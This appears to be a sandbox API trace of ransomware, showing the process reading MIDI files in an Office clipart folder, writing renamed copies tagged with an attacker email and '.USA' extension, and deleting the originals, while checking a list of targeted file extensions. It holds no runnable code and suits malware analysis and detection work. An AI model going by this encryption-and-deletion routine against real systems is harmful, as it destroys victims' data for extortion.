[0268.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0268.018] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.018] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.019] GetLastError () returned 0x0 [0268.019] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x18bb, lpOverlapped=0x0) returned 1 [0268.021] WriteFile (in: hFile=0x37c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x18c0, lpOverlapped=0x0) returned 1 [0268.021] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.022] WriteFile (in: hFile=0x37c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0268.022] SetEndOfFile (hFile=0x37c) returned 1 [0268.022] CloseHandle (hObject=0x37c) returned 1 [0268.022] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.022] SetEndOfFile (hFile=0x380) returned 1 [0268.025] CloseHandle (hObject=0x380) returned 1 [0268.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.026] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid")) returned 1 [0268.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.026] lstrlenW (lpString=".doc") returned 4 [0268.026] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.026] lstrlenW (lpString=".docx") returned 5 [0268.026] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.026] lstrlenW (lpString=".pdf") returned 4 [0268.026] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.026] lstrlenW (lpString=".xls") returned 4 [0268.026] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.026] lstrlenW (lpString=".xlsx") returned 5 [0268.026] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.026] lstrlenW (lpString=".ppt") returned 4 [0268.026] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.026] lstrlenW (lpString=".zip") returned 4 [0268.026] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.026] lstrlenW (lpString=".rar") returned 4 [0268.026] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.027] lstrlenW (lpString=".bz2") returned 4 [0268.027] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.027] lstrlenW (lpString=".7z") returned 3 [0268.027] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.027] lstrlenW (lpString=".dbf") returned 4 [0268.027] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.027] lstrlenW (lpString=".1cd") returned 4 [0268.027] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.027] lstrlenW (lpString=".jpg") returned 4 [0268.027] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.027] lstrlenW (lpString=".doc") returned 4 [0268.027] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.027] lstrlenW (lpString=".docx") returned 5 [0268.027] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.027] lstrlenW (lpString=".pdf") returned 4 [0268.027] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.027] lstrlenW (lpString=".xls") returned 4 [0268.027] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.027] lstrlenW (lpString=".xlsx") returned 5 [0268.027] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.027] lstrlenW (lpString=".ppt") returned 4 [0268.028] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.028] lstrlenW (lpString=".zip") returned 4 [0268.028] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.028] lstrlenW (lpString=".rar") returned 4 [0268.028] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.028] lstrlenW (lpString=".bz2") returned 4 [0268.028] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.028] lstrlenW (lpString=".7z") returned 3 [0268.028] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.028] lstrlenW (lpString=".dbf") returned 4 [0268.028] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.028] lstrlenW (lpString=".1cd") returned 4 [0268.028] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0268.028] lstrlenW (lpString=".jpg") returned 4 [0268.028] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.028] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.028] lstrlenW (lpString="JNGLE_01.MID") returned 12 [0268.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0268.030] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=5843) returned 1 [0268.030] CloseHandle (hObject=0x380) returned 1 [0268.030] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid")) returned 0x20 [0268.031] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0268.031] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.031] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.031] GetLastError () returned 0x0 [0268.031] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x16d3, lpOverlapped=0x0) returned 1 [0268.032] WriteFile (in: hFile=0x37c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x16e0, lpOverlapped=0x0) returned 1 [0268.033] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.033] WriteFile (in: hFile=0x37c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.033] SetEndOfFile (hFile=0x37c) returned 1 [0268.034] CloseHandle (hObject=0x37c) returned 1 [0268.034] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.034] SetEndOfFile (hFile=0x380) returned 1 [0268.035] CloseHandle (hObject=0x380) returned 1 [0268.036] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.036] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid")) returned 1 [0268.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.036] lstrlenW (lpString=".doc") returned 4 [0268.036] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.036] lstrlenW (lpString=".docx") returned 5 [0268.036] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.036] lstrlenW (lpString=".pdf") returned 4 [0268.036] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.036] lstrlenW (lpString=".xls") returned 4 [0268.036] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.036] lstrlenW (lpString=".xlsx") returned 5 [0268.036] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.036] lstrlenW (lpString=".ppt") returned 4 [0268.036] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.036] lstrlenW (lpString=".zip") returned 4 [0268.036] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.037] lstrlenW (lpString=".rar") returned 4 [0268.037] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.037] lstrlenW (lpString=".bz2") returned 4 [0268.037] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.037] lstrlenW (lpString=".7z") returned 3 [0268.037] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.037] lstrlenW (lpString=".dbf") returned 4 [0268.037] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.037] lstrlenW (lpString=".1cd") returned 4 [0268.037] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.037] lstrlenW (lpString=".jpg") returned 4 [0268.037] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.037] lstrlenW (lpString=".doc") returned 4 [0268.037] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.037] lstrlenW (lpString=".docx") returned 5 [0268.037] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.037] lstrlenW (lpString=".pdf") returned 4 [0268.037] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.037] lstrlenW (lpString=".xls") returned 4 [0268.037] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.037] lstrlenW (lpString=".xlsx") returned 5 [0268.037] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.037] lstrlenW (lpString=".ppt") returned 4 [0268.037] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.038] lstrlenW (lpString=".zip") returned 4 [0268.038] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.038] lstrlenW (lpString=".rar") returned 4 [0268.038] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.038] lstrlenW (lpString=".bz2") returned 4 [0268.038] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.038] lstrlenW (lpString=".7z") returned 3 [0268.038] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.038] lstrlenW (lpString=".dbf") returned 4 [0268.038] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.038] lstrlenW (lpString=".1cd") returned 4 [0268.038] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0268.038] lstrlenW (lpString=".jpg") returned 4 [0268.038] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.038] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.038] lstrlenW (lpString="MUSIC_01.MID") returned 12 [0268.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0268.039] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=6880) returned 1 [0268.039] CloseHandle (hObject=0x380) returned 1 [0268.039] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid")) returned 0x20 [0268.039] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0268.040] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.040] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.040] GetLastError () returned 0x0 [0268.040] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x1ae0, lpOverlapped=0x0) returned 1 [0268.042] WriteFile (in: hFile=0x37c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x1af0, lpOverlapped=0x0) returned 1 [0268.043] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.043] WriteFile (in: hFile=0x37c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.043] SetEndOfFile (hFile=0x37c) returned 1 [0268.043] CloseHandle (hObject=0x37c) returned 1 [0268.043] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.043] SetEndOfFile (hFile=0x380) returned 1 [0268.045] CloseHandle (hObject=0x380) returned 1 [0268.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.046] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid")) returned 1 [0268.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.046] lstrlenW (lpString=".doc") returned 4 [0268.046] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.046] lstrlenW (lpString=".docx") returned 5 [0268.046] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.046] lstrlenW (lpString=".pdf") returned 4 [0268.046] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.046] lstrlenW (lpString=".xls") returned 4 [0268.046] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.046] lstrlenW (lpString=".xlsx") returned 5 [0268.046] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.046] lstrlenW (lpString=".ppt") returned 4 [0268.046] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.046] lstrlenW (lpString=".zip") returned 4 [0268.047] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.047] lstrlenW (lpString=".rar") returned 4 [0268.047] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.047] lstrlenW (lpString=".bz2") returned 4 [0268.047] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.047] lstrlenW (lpString=".7z") returned 3 [0268.047] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.047] lstrlenW (lpString=".dbf") returned 4 [0268.047] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.047] lstrlenW (lpString=".1cd") returned 4 [0268.047] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.047] lstrlenW (lpString=".jpg") returned 4 [0268.047] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.047] lstrlenW (lpString=".doc") returned 4 [0268.047] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.047] lstrlenW (lpString=".docx") returned 5 [0268.047] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.047] lstrlenW (lpString=".pdf") returned 4 [0268.047] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.047] lstrlenW (lpString=".xls") returned 4 [0268.047] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.047] lstrlenW (lpString=".xlsx") returned 5 [0268.047] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.047] lstrlenW (lpString=".ppt") returned 4 [0268.047] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.047] lstrlenW (lpString=".zip") returned 4 [0268.048] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.048] lstrlenW (lpString=".rar") returned 4 [0268.048] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.048] lstrlenW (lpString=".bz2") returned 4 [0268.048] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.048] lstrlenW (lpString=".7z") returned 3 [0268.048] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.048] lstrlenW (lpString=".dbf") returned 4 [0268.048] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.048] lstrlenW (lpString=".1cd") returned 4 [0268.048] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0268.048] lstrlenW (lpString=".jpg") returned 4 [0268.048] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.048] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.048] lstrlenW (lpString="NBOOK_01.MID") returned 12 [0268.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0268.049] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=5968) returned 1 [0268.049] CloseHandle (hObject=0x380) returned 1 [0268.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid")) returned 0x20 [0268.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0268.050] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.050] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program 